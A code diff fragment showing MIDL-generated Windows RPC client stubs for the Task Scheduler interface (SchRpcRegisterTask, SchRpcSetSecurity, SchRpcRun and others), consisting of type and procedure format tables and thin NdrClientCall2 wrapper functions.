*/ 0x8, /* FC_LONG */ - 0x5c, /* FC_PAD */ -/* 6 */ - 0x12, 0x8, /* FC_UP [simple_pointer] */ -/* 8 */ - 0x25, /* FC_C_WSTRING */ - 0x5c, /* FC_PAD */ -/* 10 */ - 0x11, 0x8, /* FC_RP [simple_pointer] */ -/* 12 */ - 0x25, /* FC_C_WSTRING */ - 0x5c, /* FC_PAD */ -/* 14 */ - 0x12, 0x0, /* FC_UP */ -/* 16 */ NdrFcShort( 0x18 ), /* Offset= 24 (40) */ -/* 18 */ - 0x1a, /* FC_BOGUS_STRUCT */ - 0x3, /* 3 */ -/* 20 */ NdrFcShort( 0x18 ), /* 24 */ -/* 22 */ NdrFcShort( 0x0 ), /* 0 */ -/* 24 */ NdrFcShort( 0x8 ), /* Offset= 8 (32) */ -/* 26 */ 0x36, /* FC_POINTER */ - 0x36, /* FC_POINTER */ -/* 28 */ 0x8, /* FC_LONG */ - 0x40, /* FC_STRUCTPAD4 */ -/* 30 */ 0x5c, /* FC_PAD */ - 0x5b, /* FC_END */ -/* 32 */ - 0x12, 0x8, /* FC_UP [simple_pointer] */ -/* 34 */ - 0x25, /* FC_C_WSTRING */ - 0x5c, /* FC_PAD */ -/* 36 */ - 0x12, 0x8, /* FC_UP [simple_pointer] */ -/* 38 */ - 0x25, /* FC_C_WSTRING */ - 0x5c, /* FC_PAD */ -/* 40 */ - 0x21, /* FC_BOGUS_ARRAY */ - 0x3, /* 3 */ -/* 42 */ NdrFcShort( 0x0 ), /* 0 */ -/* 44 */ 0x28, /* Corr desc: parameter, FC_LONG */ - 0x0, /* */ -/* 46 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ -/* 48 */ NdrFcShort( 0x1 ), /* Corr flags: early, */ -/* 50 */ NdrFcLong( 0xffffffff ), /* -1 */ -/* 54 */ NdrFcShort( 0x0 ), /* Corr flags: */ -/* 56 */ 0x4c, /* FC_EMBEDDED_COMPLEX */ - 0x0, /* 0 */ -/* 58 */ NdrFcShort( 0xffd8 ), /* Offset= -40 (18) */ -/* 60 */ 0x5c, /* FC_PAD */ - 0x5b, /* FC_END */ -/* 62 */ - 0x11, 0x14, /* FC_RP [alloced_on_stack] [pointer_deref] */ -/* 64 */ NdrFcShort( 0xffc6 ), /* Offset= -58 (6) */ -/* 66 */ - 0x11, 0x14, /* FC_RP [alloced_on_stack] [pointer_deref] */ -/* 68 */ NdrFcShort( 0x2 ), /* Offset= 2 (70) */ -/* 70 */ - 0x12, 0x0, /* FC_UP */ -/* 72 */ NdrFcShort( 0x2 ), /* Offset= 2 (74) */ -/* 74 */ - 0x1a, /* FC_BOGUS_STRUCT */ - 0x3, /* 3 */ -/* 76 */ NdrFcShort( 0x18 ), /* 24 */ -/* 78 */ NdrFcShort( 0x0 ), /* 0 */ -/* 80 */ NdrFcShort( 0x8 ), /* Offset= 8 (88) */ -/* 82 */ 0x8, /* FC_LONG */ - 0x8, /* FC_LONG */ -/* 84 */ 0x36, /* FC_POINTER */ - 0x36, /* FC_POINTER */ -/* 86 */ 0x5c, /* FC_PAD */ - 0x5b, /* FC_END */ -/* 88 */ - 0x12, 0x8, /* FC_UP [simple_pointer] */ -/* 90 */ - 0x25, /* FC_C_WSTRING */ - 0x5c, /* FC_PAD */ -/* 92 */ - 0x12, 0x8, /* FC_UP [simple_pointer] */ -/* 94 */ - 0x25, /* FC_C_WSTRING */ - 0x5c, /* FC_PAD */ -/* 96 */ - 0x11, 0x8, /* FC_RP [simple_pointer] */ -/* 98 */ 0x8, /* FC_LONG */ - 0x5c, /* FC_PAD */ -/* 100 */ - 0x11, 0x14, /* FC_RP [alloced_on_stack] [pointer_deref] */ -/* 102 */ NdrFcShort( 0x2 ), /* Offset= 2 (104) */ -/* 104 */ - 0x12, 0x0, /* FC_UP */ -/* 106 */ NdrFcShort( 0x2 ), /* Offset= 2 (108) */ -/* 108 */ - 0x21, /* FC_BOGUS_ARRAY */ - 0x3, /* 3 */ -/* 110 */ NdrFcShort( 0x0 ), /* 0 */ -/* 112 */ 0x28, /* Corr desc: parameter, FC_LONG */ - 0x54, /* FC_DEREFERENCE */ -/* 114 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ -/* 116 */ NdrFcShort( 0x1 ), /* Corr flags: early, */ -/* 118 */ NdrFcLong( 0xffffffff ), /* -1 */ -/* 122 */ NdrFcShort( 0x0 ), /* Corr flags: */ -/* 124 */ - 0x12, 0x8, /* FC_UP [simple_pointer] */ -/* 126 */ - 0x25, /* FC_C_WSTRING */ - 0x5c, /* FC_PAD */ -/* 128 */ 0x5c, /* FC_PAD */ - 0x5b, /* FC_END */ -/* 130 */ - 0x11, 0x14, /* FC_RP [alloced_on_stack] [pointer_deref] */ -/* 132 */ NdrFcShort( 0x2 ), /* Offset= 2 (134) */ -/* 134 */ - 0x12, 0x0, /* FC_UP */ -/* 136 */ NdrFcShort( 0x14 ), /* Offset= 20 (156) */ -/* 138 */ - 0x1d, /* FC_SMFARRAY */ - 0x0, /* 0 */ -/* 140 */ NdrFcShort( 0x8 ), /* 8 */ -/* 142 */ 0x1, /* FC_BYTE */ - 0x5b, /* FC_END */ -/* 144 */ - 0x15, /* FC_STRUCT */ - 0x3, /* 3 */ -/* 146 */ NdrFcShort( 0x10 ), /* 16 */ -/* 148 */ 0x8, /* FC_LONG */ - 0x6, /* FC_SHORT */ -/* 150 */ 0x6, /* FC_SHORT */ - 0x4c, /* FC_EMBEDDED_COMPLEX */ -/* 152 */ 0x0, /* 0 */ - NdrFcShort( 0xfff1 ), /* Offset= -15 (138) */ - 0x5b, /* FC_END */ -/* 156 */ - 0x21, /* FC_BOGUS_ARRAY */ - 0x3, /* 3 */ -/* 158 */ NdrFcShort( 0x0 ), /* 0 */ -/* 160 */ 0x28, /* Corr desc: parameter, FC_LONG */ - 0x54, /* FC_DEREFERENCE */ -/* 162 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ -/* 164 */ NdrFcShort( 0x1 ), /* Corr flags: early, */ -/* 166 */ NdrFcLong( 0xffffffff ), /* -1 */ -/* 170 */ NdrFcShort( 0x0 ), /* Corr flags: */ -/* 172 */ 0x4c, /* FC_EMBEDDED_COMPLEX */ - 0x0, /* 0 */ -/* 174 */ NdrFcShort( 0xffe2 ), /* Offset= -30 (144) */ -/* 176 */ 0x5c, /* FC_PAD */ - 0x5b, /* FC_END */ -/* 178 */ - 0x11, 0x0, /* FC_RP */ -/* 180 */ NdrFcShort( 0xffdc ), /* Offset= -36 (144) */ -/* 182 */ - 0x11, 0x14, /* FC_RP [alloced_on_stack] [pointer_deref] */ -/* 184 */ NdrFcShort( 0x2 ), /* Offset= 2 (186) */ -/* 186 */ - 0x12, 0x0, /* FC_UP */ -/* 188 */ NdrFcShort( 0x2 ), /* Offset= 2 (190) */ -/* 190 */ - 0x21, /* FC_BOGUS_ARRAY */ - 0x3, /* 3 */ -/* 192 */ NdrFcShort( 0x0 ), /* 0 */ -/* 194 */ 0x28, /* Corr desc: parameter, FC_LONG */ - 0x54, /* FC_DEREFERENCE */ -/* 196 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ -/* 198 */ NdrFcShort( 0x1 ), /* Corr flags: early, */ -/* 200 */ NdrFcLong( 0xffffffff ), /* -1 */ -/* 204 */ NdrFcShort( 0x0 ), /* Corr flags: */ -/* 206 */ 0x4c, /* FC_EMBEDDED_COMPLEX */ - 0x0, /* 0 */ -/* 208 */ NdrFcShort( 0xffc0 ), /* Offset= -64 (144) */ -/* 210 */ 0x5c, /* FC_PAD */ - 0x5b, /* FC_END */ -/* 212 */ - 0x12, 0x0, /* FC_UP */ -/* 214 */ NdrFcShort( 0x2 ), /* Offset= 2 (216) */ -/* 216 */ - 0x21, /* FC_BOGUS_ARRAY */ - 0x3, /* 3 */ -/* 218 */ NdrFcShort( 0x0 ), /* 0 */ -/* 220 */ 0x28, /* Corr desc: parameter, FC_LONG */ - 0x0, /* */ -/* 222 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ -/* 224 */ NdrFcShort( 0x1 ), /* Corr flags: early, */ -/* 226 */ NdrFcLong( 0xffffffff ), /* -1 */ -/* 230 */ NdrFcShort( 0x0 ), /* Corr flags: */ -/* 232 */ - 0x12, 0x8, /* FC_UP [simple_pointer] */ -/* 234 */ - 0x25, /* FC_C_WSTRING */ - 0x5c, /* FC_PAD */ -/* 236 */ 0x5c, /* FC_PAD */ - 0x5b, /* FC_END */ -/* 238 */ - 0x11, 0x4, /* FC_RP [alloced_on_stack] */ -/* 240 */ NdrFcShort( 0xffa0 ), /* Offset= -96 (144) */ -/* 242 */ - 0x12, 0x0, /* FC_UP */ -/* 244 */ NdrFcShort( 0x2 ), /* Offset= 2 (246) */ -/* 246 */ - 0x15, /* FC_STRUCT */ - 0x1, /* 1 */ -/* 248 */ NdrFcShort( 0x10 ), /* 16 */ -/* 250 */ 0x6, /* FC_SHORT */ - 0x6, /* FC_SHORT */ -/* 252 */ 0x6, /* FC_SHORT */ - 0x6, /* FC_SHORT */ -/* 254 */ 0x6, /* FC_SHORT */ - 0x6, /* FC_SHORT */ -/* 256 */ 0x6, /* FC_SHORT */ - 0x6, /* FC_SHORT */ -/* 258 */ 0x5c, /* FC_PAD */ - 0x5b, /* FC_END */ -/* 260 */ - 0x11, 0x14, /* FC_RP [alloced_on_stack] [pointer_deref] */ -/* 262 */ NdrFcShort( 0x2 ), /* Offset= 2 (264) */ -/* 264 */ - 0x12, 0x0, /* FC_UP */ -/* 266 */ NdrFcShort( 0x2 ), /* Offset= 2 (268) */ -/* 268 */ - 0x21, /* FC_BOGUS_ARRAY */ - 0x1, /* 1 */ -/* 270 */ NdrFcShort( 0x0 ), /* 0 */ -/* 272 */ 0x28, /* Corr desc: parameter, FC_LONG */ - 0x54, /* FC_DEREFERENCE */ -/* 274 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ -/* 276 */ NdrFcShort( 0x1 ), /* Corr flags: early, */ -/* 278 */ NdrFcLong( 0xffffffff ), /* -1 */ -/* 282 */ NdrFcShort( 0x0 ), /* Corr flags: */ -/* 284 */ 0x4c, /* FC_EMBEDDED_COMPLEX */ - 0x0, /* 0 */ -/* 286 */ NdrFcShort( 0xffd8 ), /* Offset= -40 (246) */ -/* 288 */ 0x5c, /* FC_PAD */ - 0x5b, /* FC_END */ -/* 290 */ - 0x11, 0x4, /* FC_RP [alloced_on_stack] */ -/* 292 */ NdrFcShort( 0xffd2 ), /* Offset= -46 (246) */ - - 0x0 - } - }; - -static const unsigned short DefaultIfName_FormatStringOffsetTable[] = - { - 0, - 42, - 132, - 192, - 246, - 300, - 354, - 426, - 498, - 558, - 642, - 690, - 738, - 816, - 864, - 918, - 996, - 1050, - 1110, - 1158 - }; - - -static const MIDL_STUB_DESC DefaultIfName_StubDesc = - { - (void *)& DefaultIfName___RpcClientInterface, - MIDL_user_allocate, - MIDL_user_free, - &DefaultIfName__MIDL_AutoBindHandle, - 0, - 0, - 0, - 0, - rpc__MIDL_TypeFormatString.Format, - 1, /* -error bounds_check flag */ - 0x50002, /* Ndr library version */ - 0, - 0x800025b, /* MIDL Version 8.0.603 */ - 0, - 0, - 0, /* notify & notify_flag routine table */ - 0x1, /* MIDL flag */ - 0, /* cs routines */ - 0, /* proxy/server info */ - 0 - }; -#if _MSC_VER >= 1200 -#pragma warning(pop) -#endif - - -#endif /* defined(_M_AMD64)*/ - + + +/* this ALWAYS GENERATED file contains the RPC client stubs */ + + + /* File created by MIDL compiler version 8.00.0603 */ +/* at Mon Sep 17 17:16:17 2018 + */ +/* Compiler settings for rpc.idl: + Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.00.0603 + protocol : dce , ms_ext, c_ext, robust + error checks: allocation ref bounds_check enum stub_data + VC __declspec() decoration level: + __declspec(uuid()), __declspec(selectany), __declspec(novtable) + DECLSPEC_UUID(), MIDL_INTERFACE() +*/ +/* @@MIDL_FILE_HEADING( ) */ + +#if defined(_M_AMD64) + + +#pragma warning( disable: 4049 ) /* more than 64k source lines */ +#if _MSC_VER >= 1200 +#pragma warning(push) +#endif + +#pragma warning( disable: 4211 ) /* redefine extern to static */ +#pragma warning( disable: 4232 ) /* dllimport identity*/ +#pragma warning( disable: 4024 ) /* array to pointer mapping*/ + +#include + +#include "rpc_h.h" + +#define TYPE_FORMAT_STRING_SIZE 295 +#define PROC_FORMAT_STRING_SIZE 1207 +#define EXPR_FORMAT_STRING_SIZE 1 +#define TRANSMIT_AS_TABLE_SIZE 0 +#define WIRE_MARSHAL_TABLE_SIZE 0 + +typedef struct _rpc_MIDL_TYPE_FORMAT_STRING + { + short Pad; + unsigned char Format[ TYPE_FORMAT_STRING_SIZE ]; + } rpc_MIDL_TYPE_FORMAT_STRING; + +typedef struct _rpc_MIDL_PROC_FORMAT_STRING + { + short Pad; + unsigned char Format[ PROC_FORMAT_STRING_SIZE ]; + } rpc_MIDL_PROC_FORMAT_STRING; + +typedef struct _rpc_MIDL_EXPR_FORMAT_STRING + { + long Pad; + unsigned char Format[ EXPR_FORMAT_STRING_SIZE ]; + } rpc_MIDL_EXPR_FORMAT_STRING; + + +static const RPC_SYNTAX_IDENTIFIER _RpcTransferSyntax = +{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}}; + + +extern const rpc_MIDL_TYPE_FORMAT_STRING rpc__MIDL_TypeFormatString; +extern const rpc_MIDL_PROC_FORMAT_STRING rpc__MIDL_ProcFormatString; +extern const rpc_MIDL_EXPR_FORMAT_STRING rpc__MIDL_ExprFormatString; + +#define GENERIC_BINDING_TABLE_SIZE 0 + + +/* Standard interface: DefaultIfName, ver. 1.0, + GUID={0x86d35949,0x83c9,0x4044,{0xb4,0x24,0xdb,0x36,0x32,0x31,0xfd,0x0c}} */ + + + +static const RPC_CLIENT_INTERFACE DefaultIfName___RpcClientInterface = + { + sizeof(RPC_CLIENT_INTERFACE), + {{0x86d35949,0x83c9,0x4044,{0xb4,0x24,0xdb,0x36,0x32,0x31,0xfd,0x0c}},{1,0}}, + {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}}, + 0, + 0, + 0, + 0, + 0, + 0x00000000 + }; +RPC_IF_HANDLE DefaultIfName_v1_0_c_ifspec = (RPC_IF_HANDLE)& DefaultIfName___RpcClientInterface; + +extern const MIDL_STUB_DESC DefaultIfName_StubDesc; + +static RPC_BINDING_HANDLE DefaultIfName__MIDL_AutoBindHandle; + + +long _SchRpcHighestVersion( + /* [in] */ handle_t IDL_handle, + /* [out] */ long *arg_1) +{ + + CLIENT_CALL_RETURN _RetVal; + + _RetVal = NdrClientCall2( + ( PMIDL_STUB_DESC )&DefaultIfName_StubDesc, + (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[0], + IDL_handle, + arg_1); + return ( long )_RetVal.Simple; + +} + + +long _SchRpcRegisterTask( + /* [in] */ handle_t IDL_handle, + /* [string][unique][in] */ wchar_t *arg_1, + /* [string][in] */ wchar_t *arg_2, + /* [in] */ long arg_3, + /* [string][unique][in] */ wchar_t *arg_4, + /* [in] */ long arg_5, + /* [in] */ long arg_6, + /* [size_is][unique][in] */ struct Struct_18_t *arg_7, + /* [string][ref][out] */ wchar_t **arg_8, + /* [ref][out] */ struct Struct_74_t **arg_9) +{ + + CLIENT_CALL_RETURN _RetVal; + + _RetVal = NdrClientCall2( + ( PMIDL_STUB_DESC )&DefaultIfName_StubDesc, + (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[42], + IDL_handle, + arg_1, + arg_2, + arg_3, + arg_4, + arg_5, + arg_6, + arg_7, + arg_8, + arg_9); + return ( long )_RetVal.Simple; + +} + + +long SchRpcRetrieveTask( + /* [in] */ handle_t IDL_handle, + /* [string][in] */ wchar_t *arg_1, + /* [string][in] */ wchar_t *arg_2, + /* [in] */ long *arg_3, + /* [string][ref][out] */ wchar_t **arg_4) +{ + + CLIENT_CALL_RETURN _RetVal; + + _RetVal = NdrClientCall2( + ( PMIDL_STUB_DESC )&DefaultIfName_StubDesc, + (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[132], + IDL_handle, + arg_1, + arg_2, + arg_3, + arg_4); + return ( long )_RetVal.Simple; + +} + + +long _SchRpcCreateFolder( + /* [in] */ handle_t IDL_handle, + /* [string][in] */ wchar_t *arg_1, + /* [string][unique][in] */ wchar_t *arg_2, + /* [in] */ long arg_3) +{ + + CLIENT_CALL_RETURN _RetVal; + + _RetVal = NdrClientCall2( + ( PMIDL_STUB_DESC )&DefaultIfName_StubDesc, + (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[192], + IDL_handle, + arg_1, + arg_2, + arg_3); + return ( long )_RetVal.Simple; + +} + + +long _SchRpcSetSecurity( + /* [in] */ handle_t IDL_handle, + /* [string][in] */ wchar_t *arg_1, + /* [string][in] */ wchar_t *arg_2, + /* [in] */ long arg_3) +{ + + CLIENT_CALL_RETURN _RetVal; + + _RetVal = NdrClientCall2( + ( PMIDL_STUB_DESC )&DefaultIfName_StubDesc, + (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[246], + IDL_handle, + arg_1, + arg_2, + arg_3); + return ( long )_RetVal.Simple; + +} + + +long _SchRpcGetSecurity( + /* [in] */ handle_t IDL_handle, + /* [string][in] */ wchar_t *arg_1, + /* [in] */ long arg_2, + /* [string][ref][out] */ wchar_t **arg_3) +{ + + CLIENT_CALL_RETURN _RetVal; + + _RetVal = NdrClientCall2( + ( PMIDL_STUB_DESC )&DefaultIfName_StubDesc, + (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[300], + IDL_handle, + arg_1, + arg_2, + arg_3); + return ( long )_RetVal.Simple; + +} + + +long _SchRpcEnumFolders( + /* [in] */ handle_t IDL_handle, + /* [string][in] */ wchar_t *arg_1, + /* [in] */ long arg_2, + /* [out][in] */ long *arg_3, + /* [in] */ long arg_4, + /* [out] */ long *arg_5, + /* [string][size_is][size_is][ref][out] */ wchar_t ***arg_6) +{ + + CLIENT_CALL_RETURN _RetVal; + + _RetVal = NdrClientCall2( + ( PMIDL_STUB_DESC )&DefaultIfName_StubDesc, + (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[354], + IDL_handle, + arg_1, + arg_2, + arg_3, + arg_4, + arg_5, + arg_6); + return ( long )_RetVal.Simple; + +} + + +long _SchRpcEnumTasks( + /* [in] */ handle_t IDL_handle, + /* [string][in] */ wchar_t *arg_1, + /* [in] */ long arg_2, + /* [out][in] */ long *arg_3, + /* [in] */ long arg_4, + /* [out] */ long *arg_5, + /* [string][size_is][size_is][ref][out] */ wchar_t ***arg_6) +{ + + CLIENT_CALL_RETURN _RetVal; + + _RetVal = NdrClientCall2( + ( PMIDL_STUB_DESC )&DefaultIfName_StubDesc, + (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[426], + IDL_handle, + arg_1, + arg_2, + arg_3, + arg_4, + arg_5, + arg_6); + return ( long )_RetVal.Simple; + +} + + +long _SchRpcEnumInstances( + /* [in] */ handle_t IDL_handle, + /* [string][unique][in] */ wchar_t *arg_1, + /* [in] */ long arg_2, + /* [out] */ long *arg_3, + /* [size_is][size_is][ref][out] */ struct Struct_144_t **arg_4) +{ + + CLIENT_CALL_RETURN _RetVal; + + _RetVal = NdrClientCall2( + ( PMIDL_STUB_DESC )&DefaultIfName_StubDesc, + (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[498], + IDL_handle, + arg_1, + arg_2, + arg_3, + arg_4); + return ( long )_RetVal.Simple; + +} + + +long _SchRpcGetInstanceInfo( + /* [in] */ handle_t IDL_handle, + /* [in] */ struct Struct_144_t *arg_1, + /* [string][ref][out] */ wchar_t **arg_2, + /* [out] */ long *arg_3, + /* [string][ref][out] */ wchar_t **arg_4, + /* [string][ref][out] */ wchar_t **arg_5, + /* [out] */ long *arg_6, + /* [size_is][size_is][ref][out] */ struct Struct_144_t **arg_7, + /* [out] */ long *arg_8) +{ + + CLIENT_CALL_RETURN _RetVal; + + _RetVal = NdrClientCall2( + ( PMIDL_STUB_DESC )&DefaultIfName_StubDesc, + (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[558], + IDL_handle, + arg_1, + arg_2, + arg_3, + arg_4, + arg_5, + arg_6, + arg_7, + arg_8); + return ( long )_RetVal.Simple; + +} + + +long _SchRpcStopInstance( + /* [in] */ handle_t IDL_handle, + /* [in] */ struct Struct_144_t *arg_1, + /* [in] */ long arg_2) +{ + + CLIENT_CALL_RETURN _RetVal; + + _RetVal = NdrClientCall2( + ( PMIDL_STUB_DESC )&DefaultIfName_StubDesc, + (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[642], + IDL_handle, + arg_1, + arg_2); + return ( long )_RetVal.Simple; + +} + + +long _SchRpcStop( + /* [in] */ handle_t IDL_handle, + /* [string][unique][in] */ wchar_t *arg_1, + /* [in] */ long arg_2) +{ + + CLIENT_CALL_RETURN _RetVal; + + _RetVal = NdrClientCall2( + ( PMIDL_STUB_DESC )&DefaultIfName_StubDesc, + (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[690], + IDL_handle, + arg_1, + arg_2); + return ( long )_RetVal.Simple; + +} + + +long _SchRpcRun( + /* [in] */ handle_t IDL_handle, + /* [string][in] */ wchar_t *arg_1, + /* [in] */ long arg_2, + /* [string][size_is][unique][in] */ wchar_t **arg_3, + /* [in] */ long arg_4, + /* [in] */ long arg_5, + /* [string][unique][in] */ wchar_t *arg_6, + /* [out] */ struct Struct_144_t *arg_7) +{ + + CLIENT_CALL_RETURN _RetVal; + + _RetVal = NdrClientCall2( + ( PMIDL_STUB_DESC )&DefaultIfName_StubDesc, + (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[738], + IDL_handle, + arg_1, + arg_2, + arg_3, + arg_4, + arg_5, + arg_6, + arg_7); + return ( long )_RetVal.Simple; + +} + + +long _SchRpcDelete( + /* [in] */ handle_t IDL_handle, + /* [string][in] */ wchar_t *arg_1, + /* [in] */ long arg_2) +{ + + CLIENT_CALL_RETURN _RetVal; + + _RetVal = NdrClientCall2( + ( PMIDL_STUB_DESC )&DefaultIfName_StubDesc, + (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[816], + IDL_handle, + arg_1, + arg_2); + return ( long )_RetVal.Simple; + +} + + +long _SchRpcRename( + /* [in] */ handle_t IDL_handle, + /* [string][in] */ wchar_t *arg_1, + /* [string][in] */ wchar_t *arg_2, + /* [in] */ long arg_3) +{ + + CLIENT_CALL_RETURN _RetVal; + + _RetVal = NdrClientCall2( + ( PMIDL_STUB_DESC )&DefaultIfName_StubDesc, + (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[864], + IDL_handle, + arg_1, + arg_2, + arg_3); + return ( long )_RetVal.Simple; + +} + + +long _SchRpcScheduledRuntimes( + /* [in] */ handle_t IDL_handle, + /* [string][in] */ wchar_t *arg_1, + /* [unique][in] */ struct Struct_246_t *arg_2, + /* [unique][in] */ struct Struct_246_t *arg_3, + /* [in] */ long arg_4, + /* [in] */ long arg_5, + /* [out] */ long *arg_6, + /* [size_is][size_is][ref][out] */ struct Struct_246_t **arg_7) +{ + + CLIENT_CALL_RETURN _RetVal; + + _RetVal = NdrClientCall2( + ( PMIDL_STUB_DESC )&DefaultIfName_StubDesc, + (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[918], + IDL_handle, + arg_1, + arg_2, + arg_3, + arg_4, + arg_5, + arg_6, + arg_7); + return ( long )_RetVal.Simple; + +} + + +long _SchRpcGetLastRunInfo( + /* [in] */ handle_t IDL_handle, + /* [string][in] */ wchar_t *arg_1, + /* [out] */ struct Struct_246_t *arg_2, + /* [out] */ long *arg_3) +{ + + CLIENT_CALL_RETURN _RetVal; + + _RetVal = NdrClientCall2( + ( PMIDL_STUB_DESC )&DefaultIfName_StubDesc, + (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[996], + IDL_handle, + arg_1, + arg_2, + arg_3); + return ( long )_RetVal.Simple; + +} + + +long _SchRpcGetTaskInfo( + /* [in] */ handle_t IDL_handle, + /* [string][in] */ wchar_t *arg_1, + /* [in] */ long arg_2, + /* [out] */ long *arg_3, + /* [out] */ long *arg_4) +{ + + CLIENT_CALL_RETURN _RetVal; + + _RetVal = NdrClientCall2( + ( PMIDL_STUB_DESC )&DefaultIfName_StubDesc, + (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[1050], + IDL_handle, + arg_1, + arg_2, + arg_3, + arg_4); + return ( long )_RetVal.Simple; + +} + + +long _SchRpcGetNumberOfMissedRuns( + /* [in] */ handle_t IDL_handle, + /* [string][in] */ wchar_t *arg_1, + /* [out] */ long *arg_2) +{ + + CLIENT_CALL_RETURN _RetVal; + + _RetVal = NdrClientCall2( + ( PMIDL_STUB_DESC )&DefaultIfName_StubDesc, + (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[1110], + IDL_handle, + arg_1, + arg_2); + return ( long )_RetVal.Simple; + +} + + +long _SchRpcEnableTask( + /* [in] */ handle_t IDL_handle, + /* [string][in] */ wchar_t *arg_1, + /* [in] */ long arg_2) +{ + + CLIENT_CALL_RETURN _RetVal; + + _RetVal = NdrClientCall2( + ( PMIDL_STUB_DESC )&DefaultIfName_StubDesc, + (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[1158], + IDL_handle, + arg_1, + arg_2); + return ( long )_RetVal.Simple; + +} + + +#if !defined(__RPC_WIN64__) +#error Invalid build platform for this stub. +#endif + +static const rpc_MIDL_PROC_FORMAT_STRING rpc__MIDL_ProcFormatString = + { + 0, + { + + /* Procedure _SchRpcHighestVersion */ + + 0x0, /* 0 */ + 0x48, /* Old Flags: */ +/* 2 */ NdrFcLong( 0x0 ), /* 0 */ +/* 6 */ NdrFcShort( 0x0 ), /* 0 */ +/* 8 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ +/* 10 */ 0x32, /* FC_BIND_PRIMITIVE */ + 0x0, /* 0 */ +/* 12 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ +/* 14 */ NdrFcShort( 0x0 ), /* 0 */ +/* 16 */ NdrFcShort( 0x24 ), /* 36 */ +/* 18 */ 0x44, /* Oi2 Flags: has return, has ext, */ + 0x2, /* 2 */ +/* 20 */ 0xa, /* 10 */ + 0x1, /* Ext Flags: new corr desc, */ +/* 22 */ NdrFcShort( 0x0 ), /* 0 */ +/* 24 */ NdrFcShort( 0x0 ), /* 0 */ +/* 26 */ NdrFcShort( 0x0 ), /* 0 */ +/* 28 */ NdrFcShort( 0x0 ), /* 0 */ + + /* Parameter IDL_handle */ + +/* 30 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ +/* 32 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ +/* 34 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_1 */ + +/* 36 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ +/* 38 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ +/* 40 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Procedure _SchRpcRegisterTask */ + + + /* Return value */ + +/* 42 */ 0x0, /* 0 */ + 0x48, /* Old Flags: */ +/* 44 */ NdrFcLong( 0x0 ), /* 0 */ +/* 48 */ NdrFcShort( 0x1 ), /* 1 */ +/* 50 */ NdrFcShort( 0x58 ), /* X64 Stack size/offset = 88 */ +/* 52 */ 0x32, /* FC_BIND_PRIMITIVE */ + 0x0, /* 0 */ +/* 54 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ +/* 56 */ NdrFcShort( 0x18 ), /* 24 */ +/* 58 */ NdrFcShort( 0x8 ), /* 8 */ +/* 60 */ 0x47, /* Oi2 Flags: srv must size, clt must size, has return, has ext, */ + 0xa, /* 10 */ +/* 62 */ 0xa, /* 10 */ + 0x5, /* Ext Flags: new corr desc, srv corr check, */ +/* 64 */ NdrFcShort( 0x0 ), /* 0 */ +/* 66 */ NdrFcShort( 0x1 ), /* 1 */ +/* 68 */ NdrFcShort( 0x0 ), /* 0 */ +/* 70 */ NdrFcShort( 0x0 ), /* 0 */ + + /* Parameter IDL_handle */ + +/* 72 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */ +/* 74 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ +/* 76 */ NdrFcShort( 0x6 ), /* Type Offset=6 */ + + /* Parameter arg_1 */ + +/* 78 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ +/* 80 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ +/* 82 */ NdrFcShort( 0xc ), /* Type Offset=12 */ + + /* Parameter arg_2 */ + +/* 84 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ +/* 86 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ +/* 88 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_3 */ + +/* 90 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */ +/* 92 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ +/* 94 */ NdrFcShort( 0x6 ), /* Type Offset=6 */ + + /* Parameter arg_4 */ + +/* 96 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ +/* 98 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ +/* 100 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* 